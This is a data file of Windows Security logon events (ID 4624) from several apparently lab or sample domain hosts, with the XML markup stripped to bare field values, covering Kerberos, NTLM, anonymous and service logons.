+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769798
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x85516e
+ 3
+ Kerberos
+ Kerberos
+ -
+ 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 53668
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 769794
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x853237
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49959
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 563342
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x116c7b
+ 3
+ Kerberos
+ Kerberos
+
+ 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 55589
+ %%1833
+
+"
+2019-03-19T02:16:09.458302+04:00,1552947369.458302,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 563300
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x110085
+ 3
+ Kerberos
+ Kerberos
+
+ 31E347DC-FF67-08B3-EADC-1EC267B1975B
+ -
+ -
+ 0
+ 0x0
+ -
+ 10.0.2.17
+ 49249
+ %%1833
+
+"
+2019-03-19T02:15:49.676748+04:00,1552947349.676748,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,PC01,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 563297
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x10fc09
+ 3
+ NtLmSsp
+ NTLM
+ PC01
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 10.0.2.17
+ 49249
+ %%1833
+
+"
+2019-03-19T02:15:49.614293+04:00,1552947349.614293,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 563294
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x10fbeb
+ 3
+ Kerberos
+ Kerberos
+
+ BAEC19DA-130D-80F0-BD26-78045EE64D62
+ -
+ -
+ 0
+ 0x0
+ -
+ 10.0.2.17
+ 49249
+ %%1833
+
+"
+2019-03-19T02:15:49.598756+04:00,1552947349.598756,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 563285
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x10fbcc
+ 3
+ Kerberos
+ Kerberos
+
+ BAEC19DA-130D-80F0-BD26-78045EE64D62
+ -
+ -
+ 0
+ 0x0
+ -
+ 10.0.2.17
+ 49244
+ %%1833
+
+"
+2019-03-19T02:15:49.567435+04:00,1552947349.567435,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 563265
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x10fac2
+ 3
+ Kerberos
+ Kerberos
+
+ 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C
+ -
+ -
+ 0
+ 0x0
+ -
+ fe80::79bf:8ee2:433c:2567
+ 55585
+ %%1840
+
+"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65971
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24db24
+ 3
+ Kerberos
+ Kerberos
+ -
+ 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50152
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65969
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-2895268558-4179327395-2773671012-1108
+ EXCHANGE$
+ ICORP
+ 0x24daa6
+ 3
+ NtLmSsp
+ NTLM
+ EXCHANGE
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 0
+ 0x0
+ -
+ 192.168.111.87
+ 58128
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65967
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24c879
+ 3
+ Kerberos
+ Kerberos
+ -
+ 94BA67EA-8490-3C86-6DB7-DF74C9AA4449
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50151
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 10113
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x2e4ce
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x38f87e
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1b90
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ l
+ o
+ %%1843
+ 0x0
+ %%1843
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982101
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x73b44c
+ 3
+ Kerberos
+ Kerberos
+ -
+ E8C9AC4A-31FC-C37F-B4D7-B3217C608858
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64849
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982097
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ 3B
+ 0x738cf9
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.19
+ 50616
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982092
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ 3B
+ 0x738ce4
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.19
+ 50614
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982089
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ 3B
+ 0x738afd
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.19
+ 50613
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2982084
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-101606
+ lgrove
+ THREEBEESCO.COM
+ 0x738ae4
+ 3
+ Kerberos
+ Kerberos
+ -
+ DCED4BA6-CF24-37EF-0627-B0E4EED7F565
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.19
+ 50609
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 566894
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x18423d
+ 3
+ Kerberos
+ Kerberos
+
+ 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C
+ -
+ -
+ 0
+ 0x0
+ -
+ fe80::79bf:8ee2:433c:2567
+ 56034
+ %%1840
+
+"
+2019-03-19T04:02:21.929554+04:00,1552953741.929554,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 566889
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x184212
+ 3
+ Kerberos
+ Kerberos
+
+ 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 56033
+ %%1833
+
+"
+2019-03-19T04:02:04.319945+04:00,1552953724.319945,4624,Administrator,EXAMPLE,3,NtLmSsp,-,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 566835
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x17e2d2
+ 3
+ NtLmSsp
+ NTLM
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+ %%1833
+
+"
+2019-03-19T04:02:04.241919+04:00,1552953724.241919,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 566830
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x17e2c0
+ 3
+ NtLmSsp
+ NTLM
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 10.0.2.17
+ 49237
+ %%1833
+
+"
+2019-03-19T04:02:04.226251+04:00,1552953724.226251,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 566826
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x17e2aa
+ 3
+ NtLmSsp
+ NTLM
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 10.0.2.17
+ 49236
+ %%1833
+
+"
+2019-03-19T04:02:04.210688+04:00,1552953724.210688,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,NULL,WIN-77LTAPHIQ1R.example.corp,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 566823
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x17e29a
+ 3
+ NtLmSsp
+ NTLM
+ NULL
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 10.0.2.17
+ 49236
+ %%1833
+
+"
+2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5323
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x7d4f4
+ 3
+ NtLmSsp
+ NTLM
+ PC01
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 10.0.2.17
+ 49169
+
+"
+2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5322
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x73d02
+ 3
+ NtLmSsp
+ NTLM
+ PC01
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 10.0.2.17
+ 49168
+
+"
+2019-02-13T19:29:41.418441+04:00,1550071781.418441,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5319
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ PC02
+ 0x4a26d
+ 2
+ User32
+ Negotiate
+ PC02
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x994
+ C:\Windows\System32\winlogon.exe
+ 127.0.0.1
+ 0
+
+"
+2019-02-13T19:27:53.653483+04:00,1550071673.653483,4624,IEUser,PC02,10,User32,127.0.0.1,PC02,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5315
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ PC02
+ 0x45120
+ 10
+ User32
+ Negotiate
+ PC02
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x658
+ C:\Windows\System32\winlogon.exe
+ 127.0.0.1
+ 49164
+
+"
+2019-02-13T19:25:17.799376+04:00,1550071517.799376,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5308
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ PC02
+ 0x21f73
+ 2
+ User32
+ Negotiate
+ PC02
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x198
+ C:\Windows\System32\winlogon.exe
+ 127.0.0.1
+ 0
+
+"
+2019-02-13T19:19:51.259835+04:00,1550071191.259835,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5305
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:17:38.779337+04:00,1550071058.779337,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5303
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:17:38.018243+04:00,1550071058.018243,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5302
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x113f5
+ 3
+ NtLmSsp
+ NTLM
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 0
+ 0x0
+ -
+ -
+ -
+
+"
+2019-02-13T19:15:08.821952+04:00,1550070908.821952,4624,sshd_server,PC02,5,Advapi,-,PC02,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5299
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-21-3583694148-1414552638-2922671848-1002
+ sshd_server
+ PC02
+ 0xe509
+ 5
+ Advapi
+ Negotiate
+ PC02
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:08.689762+04:00,1550070908.689762,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5296
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:07.852561+04:00,1550070907.852561,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5293
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:07.422945+04:00,1550070907.422945,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5291
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:05.924796+04:00,1550070905.924796,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5289
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:05.660417+04:00,1550070905.660417,4624,LOCAL SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5287
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:05.065564+04:00,1550070905.065564,4624,NETWORK SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5285
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-20
+ NETWORK SERVICE
+ NT AUTHORITY
+ 0x3e4
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:04.911343+04:00,1550070904.911343,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5283
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1d0
+ C:\Windows\System32\services.exe
+ -
+ -
+
+"
+2019-02-13T19:15:04.635947+04:00,1550070904.635947,4624,SYSTEM,NT AUTHORITY,0,-,-,-,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5281
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 0
+ -
+ -
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x4
+
+ -
+ -
+
+"
+2019-02-13T19:15:04.135227+04:00,1550070904.135227,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 5278
+
+
+
+
+ Security
+ PC02.example.corp
+
+
+
+
+ S-1-5-18
+ PC02$
+ EXAMPLE
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
